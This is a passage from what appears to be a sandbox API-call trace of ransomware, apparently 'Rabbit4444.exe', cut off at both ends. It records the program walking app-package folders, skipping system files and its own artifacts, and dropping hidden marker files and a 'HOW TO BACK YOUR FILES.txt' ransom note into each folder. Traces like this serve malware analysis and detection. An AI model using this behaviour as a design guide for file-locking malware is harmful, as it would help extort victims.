ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239bf5b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x935b10a7, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0062.117] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0062.117] lstrcpyW (in: lpString1=0x130ebd6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0062.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0062.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x11e380 [0062.118] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1222c8 [0062.118] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b376c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239c8b0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x935b376c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0062.118] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0062.118] lstrcpyW (in: lpString1=0x130ebd6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0062.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0062.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123760 [0062.118] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122368 [0062.118] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935bacb1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935bfac7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x935c355f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0062.118] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0062.118] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0062.118] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0062.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x124758 [0062.119] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122208 [0062.119] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935be769, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935be769, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x935be769, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0062.119] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0062.119] lstrcpyW (in: lpString1=0x130ebd6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0062.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0062.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x123820 [0062.119] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220c8 [0062.119] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b5e79, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239e313, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x935b5e79, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0062.119] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0062.119] lstrcpyW (in: lpString1=0x130ebd6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0062.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0062.119] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x124d90 [0062.119] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122128 [0062.119] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b5e79, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239e313, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x935b5e79, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0062.120] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0062.120] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.120] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.120] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.121] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.121] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.121] CloseHandle (hObject=0x298) returned 1 [0062.121] CloseHandle (hObject=0x27c) returned 1 [0062.121] GetCurrentThreadId () returned 0xd98 [0062.121] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0062.121] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState" [0062.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.121] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0062.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState" [0062.121] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\" [0062.121] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0062.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.128] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.131] FlushFileBuffers (hFile=0x27c) returned 1 [0062.131] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.132] CloseHandle (hObject=0x27c) returned 1 [0062.132] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState") returned 88 [0062.132] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.132] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b5e79, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239e313, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0062.132] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.132] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b5e79, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239e313, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.132] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.133] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee5bae0e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee5bae0e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.133] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.133] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.133] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee5bae0e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee5bae0e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.133] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0062.133] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.133] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.133] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.134] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.134] CloseHandle (hObject=0x298) returned 1 [0062.134] CloseHandle (hObject=0x27c) returned 1 [0062.134] GetCurrentThreadId () returned 0xd98 [0062.134] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0062.134] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData" [0062.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0062.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0062.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData" [0062.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\" [0062.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0062.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.136] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.138] FlushFileBuffers (hFile=0x27c) returned 1 [0062.141] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.142] CloseHandle (hObject=0x27c) returned 1 [0062.142] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData") returned 92 [0062.142] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935be769, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935be769, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.143] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.143] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.143] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.143] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.143] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935be769, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935be769, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.143] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.143] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.143] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.143] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.143] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.143] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee5bae0e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee5bae0e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.143] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.143] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.143] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee5bae0e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee5bae0e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee5bae0e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.143] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.143] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.143] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.144] CreateFileMappingW (hFile=0x27c, 